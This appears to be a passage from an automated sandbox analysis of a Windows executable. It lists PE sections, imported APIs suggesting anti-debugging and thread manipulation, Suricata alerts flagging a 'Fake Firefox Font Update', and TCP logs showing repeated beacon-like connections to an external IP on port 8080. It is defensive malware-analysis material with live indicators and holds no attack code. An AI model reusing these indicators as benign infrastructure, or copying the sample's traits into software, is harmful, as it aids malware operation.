.eh_fram	0x32000	0x5a54	0x5c00	cecdba5a38cd979b609cc7ed770370a6	False	0.3012058423913043	data	4.87734250713647	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.bss	0x38000	0xd60	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x39000	0xd2c	0xe00	b35ff9b62b16a100bd2cc076e9eec51e	False	0.38253348214285715	data	5.085846307423846	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT	0x3a000	0x38	0x200	be43b8407ee9c03eea15b7f75f778714	False	0.072265625	data	0.3195396310293397	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x3b000	0x8	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x3c000	0x224	0x400	607703b05b5f04b5884d9f6aa2c5cda8	False	0.3056640625	data	3.4103687270366034	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x3d000	0x1974	0x1a00	bcf6e1b200c8178aaf8164efda0e1e90	False	0.8143028846153846	data	6.667293120350955	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x3c058	0x1ca	XML 1.0 document, ASCII text, with very long lines (456), with CRLF line terminators	English	United States	0.5764192139737991

Imports

DLL	Import
KERNEL32.dll	AddVectoredExceptionHandler, CloseHandle, CreateEventA, CreateSemaphoreA, DeleteCriticalSection, DuplicateHandle, EnterCriticalSection, FreeLibrary, GetCurrentProcess, GetCurrentProcessId, GetCurrentThread, GetCurrentThreadId, GetHandleInformation, GetLastError, GetModuleHandleA, GetModuleHandleW, GetProcAddress, GetProcessAffinityMask, GetStartupInfoA, GetSystemTimeAsFileTime, GetThreadContext, GetThreadPriority, GetTickCount, InitializeCriticalSection, IsDBCSLeadByteEx, IsDebuggerPresent, LeaveCriticalSection, LoadLibraryA, MultiByteToWideChar, OpenProcess, OutputDebugStringA, QueryPerformanceCounter, QueryPerformanceFrequency, RaiseException, ReleaseSemaphore, RemoveVectoredExceptionHandler, ResetEvent, ResumeThread, SetEvent, SetLastError, SetProcessAffinityMask, SetThreadContext, SetThreadPriority, SetUnhandledExceptionFilter, Sleep, SuspendThread, TlsAlloc, TlsGetValue, TlsSetValue, TryEnterCriticalSection, VirtualAlloc, VirtualFree, VirtualProtect, VirtualQuery, WaitForMultipleObjects, WaitForSingleObject, WideCharToMultiByte
msvcrt.dll	__getmainargs, __initenv, __lconv_init, __mb_cur_max, __p__acmdln, __p__commode, __p__fmode, __set_app_type, __setusermatherr, _amsg_exit, _beginthreadex, _cexit, _endthreadex, _errno, _fileno, _initterm, _iob, _lock, _onexit, _setjmp3, _setmode, _strdup, _ultoa, _unlock, _vsnprintf, _vsnwprintf, _wfopen, _wgetenv, abort, atoi, calloc, exit, fclose, fflush, fgetwc, fprintf, fputc, free, fwrite, getc, localeconv, longjmp, malloc, memchr, memcmp, memcpy, memmove, memset, printf, realloc, setlocale, setvbuf, signal, strchr, strerror, strlen, strncmp, vfprintf, wcslen
USER32.dll	MessageBoxA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-16T12:18:21.489781+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49730	52.17.181.189	443	TCP
2024-12-16T12:18:23.502993+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49731	34.117.59.81	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 16, 2024 12:18:20.086318016 CET	49730	443	192.168.2.4	52.17.181.189
Dec 16, 2024 12:18:20.086353064 CET	443	49730	52.17.181.189	192.168.2.4
Dec 16, 2024 12:18:20.086427927 CET	49730	443	192.168.2.4	52.17.181.189
Dec 16, 2024 12:18:20.089668036 CET	49730	443	192.168.2.4	52.17.181.189
Dec 16, 2024 12:18:20.089692116 CET	443	49730	52.17.181.189	192.168.2.4
Dec 16, 2024 12:18:21.489557981 CET	443	49730	52.17.181.189	192.168.2.4
Dec 16, 2024 12:18:21.489780903 CET	49730	443	192.168.2.4	52.17.181.189
Dec 16, 2024 12:18:21.494684935 CET	49730	443	192.168.2.4	52.17.181.189
Dec 16, 2024 12:18:21.494702101 CET	443	49730	52.17.181.189	192.168.2.4
Dec 16, 2024 12:18:21.495143890 CET	443	49730	52.17.181.189	192.168.2.4
Dec 16, 2024 12:18:21.538237095 CET	49730	443	192.168.2.4	52.17.181.189
Dec 16, 2024 12:18:21.689815044 CET	49730	443	192.168.2.4	52.17.181.189
Dec 16, 2024 12:18:21.731329918 CET	443	49730	52.17.181.189	192.168.2.4
Dec 16, 2024 12:18:22.083914995 CET	443	49730	52.17.181.189	192.168.2.4
Dec 16, 2024 12:18:22.084013939 CET	443	49730	52.17.181.189	192.168.2.4
Dec 16, 2024 12:18:22.084108114 CET	49730	443	192.168.2.4	52.17.181.189
Dec 16, 2024 12:18:22.107765913 CET	49730	443	192.168.2.4	52.17.181.189
Dec 16, 2024 12:18:22.107767105 CET	49730	443	192.168.2.4	52.17.181.189
Dec 16, 2024 12:18:22.107840061 CET	443	49730	52.17.181.189	192.168.2.4
Dec 16, 2024 12:18:22.107872009 CET	443	49730	52.17.181.189	192.168.2.4
Dec 16, 2024 12:18:22.281847000 CET	49731	443	192.168.2.4	34.117.59.81
Dec 16, 2024 12:18:22.281892061 CET	443	49731	34.117.59.81	192.168.2.4
Dec 16, 2024 12:18:22.282263041 CET	49731	443	192.168.2.4	34.117.59.81
Dec 16, 2024 12:18:22.282763004 CET	49731	443	192.168.2.4	34.117.59.81
Dec 16, 2024 12:18:22.282787085 CET	443	49731	34.117.59.81	192.168.2.4
Dec 16, 2024 12:18:23.502917051 CET	443	49731	34.117.59.81	192.168.2.4
Dec 16, 2024 12:18:23.502993107 CET	49731	443	192.168.2.4	34.117.59.81
Dec 16, 2024 12:18:23.506222010 CET	49731	443	192.168.2.4	34.117.59.81
Dec 16, 2024 12:18:23.506242037 CET	443	49731	34.117.59.81	192.168.2.4
Dec 16, 2024 12:18:23.506603003 CET	443	49731	34.117.59.81	192.168.2.4
Dec 16, 2024 12:18:23.507936001 CET	49731	443	192.168.2.4	34.117.59.81
Dec 16, 2024 12:18:23.551425934 CET	443	49731	34.117.59.81	192.168.2.4
Dec 16, 2024 12:18:23.957082033 CET	443	49731	34.117.59.81	192.168.2.4
Dec 16, 2024 12:18:23.957166910 CET	443	49731	34.117.59.81	192.168.2.4
Dec 16, 2024 12:18:23.957470894 CET	49731	443	192.168.2.4	34.117.59.81
Dec 16, 2024 12:18:23.957557917 CET	49731	443	192.168.2.4	34.117.59.81
Dec 16, 2024 12:18:23.957590103 CET	443	49731	34.117.59.81	192.168.2.4
Dec 16, 2024 12:18:23.957628965 CET	49731	443	192.168.2.4	34.117.59.81
Dec 16, 2024 12:18:23.957638979 CET	443	49731	34.117.59.81	192.168.2.4
Dec 16, 2024 12:18:29.744147062 CET	49737	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:29.864365101 CET	8080	49737	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:29.864577055 CET	49737	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:29.864702940 CET	49737	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:29.864702940 CET	49737	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:29.985088110 CET	8080	49737	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:29.985131025 CET	8080	49737	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:31.126600027 CET	8080	49737	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:31.179056883 CET	49737	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:31.244285107 CET	49737	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:31.244872093 CET	49739	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:31.365209103 CET	8080	49737	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:31.365262985 CET	8080	49739	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:31.365452051 CET	49737	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:31.365540028 CET	49739	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:31.365756989 CET	49739	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:31.365756989 CET	49739	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:31.485583067 CET	8080	49739	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:31.485687971 CET	8080	49739	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:32.644475937 CET	8080	49739	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:32.694776058 CET	49739	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:32.760598898 CET	49739	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:32.761394024 CET	49740	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:32.881159067 CET	8080	49739	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:32.881398916 CET	49739	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:32.881639004 CET	8080	49740	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:32.881858110 CET	49740	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:32.882257938 CET	49740	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:32.882257938 CET	49740	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:33.002357006 CET	8080	49740	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:33.002397060 CET	8080	49740	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:34.149986982 CET	8080	49740	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:34.194711924 CET	49740	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:34.259881020 CET	49740	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:34.260597944 CET	49741	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:34.380970955 CET	8080	49741	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:34.381016970 CET	8080	49740	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:34.381073952 CET	49741	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:34.381095886 CET	49740	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:34.383893967 CET	49741	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:34.383893967 CET	49741	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:34.504313946 CET	8080	49741	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:34.504359007 CET	8080	49741	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:35.632550955 CET	8080	49741	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:35.679152966 CET	49741	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:35.744199038 CET	49741	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:35.745141029 CET	49742	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:35.864758015 CET	8080	49741	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:35.864864111 CET	49741	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:35.865055084 CET	8080	49742	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:35.865184069 CET	49742	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:35.865670919 CET	49742	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:35.865670919 CET	49742	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:35.985827923 CET	8080	49742	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:35.985871077 CET	8080	49742	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:37.127721071 CET	8080	49742	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:37.179059982 CET	49742	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:37.244469881 CET	49742	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:37.245306015 CET	49743	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:37.365262985 CET	8080	49742	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:37.365292072 CET	8080	49743	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:37.365473986 CET	49742	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:37.365521908 CET	49743	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:37.365828037 CET	49743	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:37.365828037 CET	49743	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:37.485686064 CET	8080	49743	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:37.485729933 CET	8080	49743	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:38.626528025 CET	8080	49743	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:38.678926945 CET	49743	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:38.743866920 CET	49743	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:38.744601011 CET	49744	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:38.864729881 CET	8080	49744	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:38.864785910 CET	8080	49743	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:38.865156889 CET	49743	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:38.865314007 CET	49744	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:38.865314007 CET	49744	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:38.871268988 CET	49744	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:38.985388994 CET	8080	49744	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:38.991281033 CET	8080	49744	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:40.115755081 CET	8080	49744	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:40.163383007 CET	49744	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:40.228713989 CET	49744	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:40.229490995 CET	49745	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:40.349167109 CET	8080	49744	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:40.349390984 CET	8080	49745	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:40.349441051 CET	49744	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:40.349679947 CET	49745	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:40.349771023 CET	49745	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:40.349787951 CET	49745	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:40.469837904 CET	8080	49745	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:40.469880104 CET	8080	49745	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:41.614937067 CET	8080	49745	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:41.663381100 CET	49745	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:41.728754044 CET	49745	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:41.729594946 CET	49746	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:41.849312067 CET	8080	49745	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:41.849526882 CET	49745	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:41.849899054 CET	8080	49746	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:41.849978924 CET	49746	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:41.850178957 CET	49746	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:41.850192070 CET	49746	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:41.970221996 CET	8080	49746	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:41.970279932 CET	8080	49746	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:43.126413107 CET	8080	49746	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:43.178946018 CET	49746	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:43.244606018 CET	49746	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:43.245304108 CET	49747	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:43.365080118 CET	8080	49746	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:43.365144968 CET	8080	49747	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:43.365430117 CET	49747	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:43.365443945 CET	49746	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:43.365725994 CET	49747	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:43.365751982 CET	49747	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:43.485775948 CET	8080	49747	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:43.485820055 CET	8080	49747	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:44.664764881 CET	8080	49747	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:44.710294008 CET	49747	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:44.776299953 CET	49747	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:44.777086973 CET	49748	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:44.897037983 CET	8080	49748	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:44.897084951 CET	8080	49747	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:44.897559881 CET	49748	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:44.897679090 CET	49747	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:44.897996902 CET	49748	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:44.897996902 CET	49748	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:45.017822981 CET	8080	49748	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:45.017854929 CET	8080	49748	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:46.155132055 CET	8080	49748	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:46.210205078 CET	49748	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:46.260133982 CET	49748	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:46.260957956 CET	49749	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:46.381330967 CET	8080	49748	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:46.381421089 CET	8080	49749	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:46.381692886 CET	49748	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:46.381709099 CET	49749	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:46.381827116 CET	49749	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:46.381858110 CET	49749	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:46.502140999 CET	8080	49749	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:46.502185106 CET	8080	49749	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:47.679086924 CET	8080	49749	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:47.726090908 CET	49749	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:47.791404009 CET	49749	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:47.792278051 CET	49750	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:47.912512064 CET	8080	49749	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:47.912568092 CET	8080	49750	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:47.912759066 CET	49749	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:47.912763119 CET	49750	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:47.912899017 CET	49750	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:47.912899017 CET	49750	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:48.033442974 CET	8080	49750	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:48.033488035 CET	8080	49750	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:49.163081884 CET	8080	49750	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:49.210309029 CET	49750	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:49.282023907 CET	49750	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:49.283112049 CET	49751	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:49.403075933 CET	8080	49750	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:49.403106928 CET	8080	49751	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:49.403434038 CET	49751	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:49.403475046 CET	49750	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:49.403569937 CET	49751	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:49.403615952 CET	49751	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:49.524369001 CET	8080	49751	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:49.524411917 CET	8080	49751	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:50.684722900 CET	8080	49751	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:50.725975990 CET	49751	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:50.791534901 CET	49751	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:50.792380095 CET	49752	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:50.912817955 CET	8080	49751	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:50.912861109 CET	8080	49752	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:50.912925959 CET	49751	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:50.912966967 CET	49752	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:50.913223982 CET	49752	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:50.913258076 CET	49752	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:51.033076048 CET	8080	49752	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:51.033132076 CET	8080	49752	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:52.270313978 CET	8080	49752	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:52.319813013 CET	49752	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:52.384747028 CET	49752	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:52.385404110 CET	49753	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:52.505496025 CET	8080	49752	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:52.505619049 CET	49752	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:52.505687952 CET	8080	49753	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:52.505779982 CET	49753	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:52.506052971 CET	49753	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:52.506097078 CET	49753	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:52.626302958 CET	8080	49753	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:52.626348019 CET	8080	49753	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:53.830374002 CET	8080	49753	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:53.882055998 CET	49753	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:53.946822882 CET	49753	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:53.947499037 CET	49754	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:54.067523003 CET	8080	49754	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:54.067581892 CET	8080	49753	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:54.067645073 CET	49754	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:54.067663908 CET	49753	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:54.067876101 CET	49754	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:54.067914009 CET	49754	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:54.188047886 CET	8080	49754	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:54.188069105 CET	8080	49754	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:55.350877047 CET	8080	49754	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:55.397758007 CET	49754	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:55.491844893 CET	49754	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:55.492425919 CET	49755	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:55.612330914 CET	8080	49754	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:55.612358093 CET	8080	49755	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:55.612443924 CET	49755	8080	192.168.2.4	31.13.224.69
